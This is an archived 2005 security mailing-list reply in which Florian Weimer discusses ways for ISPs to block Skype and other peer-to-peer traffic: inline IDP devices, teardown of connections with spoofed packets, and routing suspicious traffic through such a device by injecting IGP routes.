lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Mon Apr  4 13:18:46 2005
From: fw at deneb.enyo.de (Florian Weimer)
Subject: Blocking Skype on ISP level

* Jochen Kaiser:

> This can be achieved by using an IDP system and blocking the
> appropriate p2p protocol (I forgot which one. overnet?). 
> An IDP is a device which works with signatures as known from
> IDS-Systems and instead of reporting malicious activity
> it blocks packets or connections. Therefore it must be placed
> in your forwarding path.

The latter is not necessary if the targeted application uses TCP
connections or similar things which do not cryptographically secure
the connection against teardown by suitably spoofed packets.  However,
my experiments in this area indicate that a lot of clients try to
immediately reestablish connections, and bandwidth utilization goes up
significantly (although the application does not make forward
progress).

A compromise would be injection of IGP routes, to just route traffic
to suspicious targets through the device.  I'm not sure if such
products already exist on the market because considerable diligence is
required to avoid loops.

> At the moment, there are fast linux based appliances which are
> capable of forwarding a few hundred megabits depending on the
> ruleset. (It is worth to mention, that the bandwidth is not the
> problem here, but that you will get jitter and delays by using
> a forwarding device in software where asics/fpga should be used.
> So as an ISP who shall grant best quality for all customers the
> usage of a software based IDP may not be the appropriate way.
> For the end customer it may be the right choice.)

Are your lab results available to interested parties?  A medium-sized
research network is considering the installation of such devices for
all of its sites, and it could well be possible to resolve the legal
obstacles.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ